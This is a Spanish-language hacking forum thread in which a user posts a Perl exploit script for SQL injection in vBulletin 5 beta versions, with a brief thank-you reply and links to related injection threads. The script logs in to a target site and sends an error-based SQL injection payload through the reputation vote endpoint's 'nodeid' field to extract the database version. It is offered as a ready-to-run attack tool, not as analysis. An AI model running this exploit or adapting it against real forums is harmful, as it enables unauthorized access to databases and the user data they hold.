vBulletin 5.0.0 Beta 11 - 5.0.0 Beta 28 - SQL Injection

  • 1 Respuestas
  • 3184 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado morodog

  • *
  • Ex-Staff
  • *****
  • Mensajes: 350
  • Actividad:
    0%
  • Reputación 1
  • Skype: MorodoG
  • Twitter: m4r4d4g
    • Ver Perfil
Bajas Perl y guardas el código como .pl

Código: You are not allowed to view links. Register or Login
#!/usr/bin/perl
use LWP::UserAgent;
use HTTP::Cookies;
use HTTP::Request::Common;
use MIME::Base64;
system $^O eq 'MSWin32' ? 'cls' : 'clear';
print "
+===================================================+
|           vBulletin 5 Beta XX SQLi 0day           |
|              Author: Orestis Kourides             |
|             Web Site: http://www.cyitsec.net             |
+===================================================+
";
 
if (@ARGV != 5) {
    print "\r\nUsage: perl vb5exp.pl http://WWW.HOST.COM VBPATH URUSER URPASS MAGICNUM\r\n";
    exit;
}
 
$host       = $ARGV[0];
$path       = $ARGV[1];
$username   = $ARGV[2];
$password   = $ARGV[3];
$magicnum   = $ARGV[4];
$encpath    = encode_base64('http://'.$host.$path);
print "
  • Logging\n";[/li][/list]
    print "
  • Username: ".$username."\n";[/li][/list]
    print "
  • Password: ".$password."\n";[/li][/list]
    print "
  • MagicNum: ".$magicnum."\n";[/li][/list]
    print "
  • " .$host.$path."auth/login\n";[/li][/list]
    my $browser = LWP::UserAgent->new;
    my $cookie_jar = HTTP::Cookies->new;
    my $response = $browser->post( 'http://'.$host.$path.'auth/login',
        [
            'url' => $encpath,
            'username' => $username,
            'password' => $password,
        ],
        Referer => 'http://'.$host.$path.'auth/login-form?url=http://'.$host.$path.'',
        User-Agent => 'Mozilla/5.0 (Windows NT 6.1; rv:13.0) Gecko/20100101 Firefox/13.0',
    );
    $browser->cookie_jar( $cookie_jar );
    my $browser = LWP::UserAgent->new;
    $browser->cookie_jar( $cookie_jar );
    print "
  • Requesting\n";[/li][/list]
    my $response = $browser->post( 'http://'.$host.$path.'index.php/ajax/api/reputation/vote',
        [
            'nodeid' => $magicnum.') and(select 1 from(select count(*),concat((select (select concat(0x23,cast(version() as char),0x23)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338',
        ],
        User-Agent => 'Mozilla/5.0 (Windows NT 6.1; rv:13.0) Gecko/20100101 Firefox/13.0',
    );
    $data = $response->content;
    if ($data =~ /(#((\\.)|[^\\#])*#)/) { print '
  • Version: '.$1 };[/li][/list]
    print "\n";
    exit 1;


    Saludos

Desconectado ANTRAX

  • *
  • Administrator
  • Mensajes: 5667
  • Actividad:
    63.33%
  • Country: ar
  • Reputación 37
  • ANTRAX
  • Skype: underc0de.org
  • Twitter: @Underc0de
    • Ver Perfil
    • Underc0de
    • Email
Muy buen aporte!
+Karma!
Muchisimas gracias!


 

SQL Injection - Joomla módulo "com_fireboard"

Iniciado por M5f3r0

Respuestas: 0
Vistas: 3018
Último mensaje Agosto 16, 2013, 01:43:18 am
por M5f3r0
[Curso] SQL Injection desde 0 - Union based y Blind Boolean Based.

Iniciado por M5f3r0

Respuestas: 8
Vistas: 13893
Último mensaje Abril 21, 2017, 04:36:34 am
por M5f3r0
Mysql injection avanzada: "doble query/error based"

Iniciado por q3rv0

Respuestas: 2
Vistas: 4146
Último mensaje Agosto 30, 2012, 04:26:01 am
por andrewtwo
Tecnicas de Blind Mysql Injection (Bit Shifting && Find_in_set())

Iniciado por q3rv0

Respuestas: 3
Vistas: 3635
Último mensaje Agosto 30, 2012, 12:50:52 am
por andrewtwo
LDAP Injection (Lightweight Directory Access Protocol)

Iniciado por M5f3r0

Respuestas: 1
Vistas: 3290
Último mensaje Noviembre 01, 2013, 02:19:28 pm
por ANTRAX